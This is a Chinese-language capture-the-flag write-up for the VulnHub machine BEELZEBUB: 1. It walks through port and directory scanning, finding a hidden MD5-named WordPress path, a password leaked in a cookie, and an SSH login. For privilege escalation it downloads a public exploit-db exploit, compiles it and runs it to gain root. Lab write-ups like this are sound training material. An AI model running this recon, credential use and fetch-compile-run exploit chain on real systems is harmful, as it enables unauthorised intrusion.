一、前言
主要利用方式:信息收集:发现MD5目录+ wp的用户及密码获取+从历史记录中提取了本地服务提权exp
二、靶机信息
靶场: vulnhub.com
靶机名称: BEELZEBUB: 1
难度: 中等
发布时间: 2021 年 9月 8日
下载地址:https://www.vulnhub.com/entry/beelzebub-1,742/
备注:本靶场,思路与平常的靶机有一些出入,整体的困难点在于页面交互的提醒,
以及ssh 的账号密码获取方式,到最后提权要依赖history才能后进行提权
三、虚拟机配置
vmware、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配
四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l
2、探测靶机的开发端口及服务
└─$ sudo nmap -p- 192.168.169.155
└─$ sudo nmap -p22,80 -sV -A 192.168.169.155
3、浏览器访问80端口,及路径遍历
http://192.168.169.155/
└─$ dirsearch -u 192.168.169.155
4、路径访问index.php、phpmyadmin.php及初步尝试弱口令等
5、尝试了很多,依然没发现上哈地方还有可以探测的,经过其他文章提醒,发现index页面的apache版本和nmap扫描的不一致,并查源代码
得了一个提醒:
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
通过翻译:我的心被加密了,"beelzebub "以某种方式入侵并解码了它。-MD5
说被MD5加密了,我们把beelzebub用MD5加密一下
【MD5(beelzebub)==> d18e1e22becbd915b45e0e655429d487)】
6、通过加密后的数据,放入浏览器做对比,可以发现,这有可能是个目录
7、既然有可能是目录,进行目录扫描
8、通过对所有页面进行访问,只有upload可以正常访问
http://192.168.169.156/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/
经过探测,有Talk To VALAK 这个页面可以访问,并且抓包看起来是正常的。
9、经过抓包,发现输入任何内容进去,都反馈了:Set-Cookie: Password=M4k3Ad3a1
10、因为有22端口,尝试一下VALAK这个类似用户的东西,也可以顺带扫描一下wordpress 用户(果然发现:valak及krampus两个用户)
wpscan --url=http://192.168.169.156/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force
五、漏洞利用(突破边界)
11、再次验证了valak 用户存在,如果SSH(22)的密码为:M4k3Ad3a1?是否可以登录进去瞧瞧,
12、经过尝试(valak:M4k3Ad3a1 )密码错误,再次尝试用户(krampus:M4k3Ad3a1 )
13、krampus用户ssh登录,获取第一个flag
aq12uu909a0q921a2819b05568a992m9
14、尝试su 提权以及查找su权限执行的任务-->均失败
六、提权
15、history // 查看历史命令
64 wget https://www.exploit-db.com/download/47009
65 clear
66 ls
67 clear
68 mv 47009 ./exploit.c
69 gcc exploit.c -o exploit
70 ./exploit
71 cd ../../../../../../../
72 ls
73 cd cd
74 cd
75 grep -r 'beelzebub'
76 grep -r 'love'
77 cd .local/share
78 clear
79 ls
80 cd Trash/
81 ls
82 cat info
16、历史命令中存在下载提权操作的脚本,进行访问,此exp类似服务器本地提权漏洞
17、并在靶机按照步骤执行
wget https://www.exploit-db.com/download/47009
ls
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
18、获取目标靶机IP,获取root权限下的flag(8955qpasq8qq807879p75e1rr24cr1a5)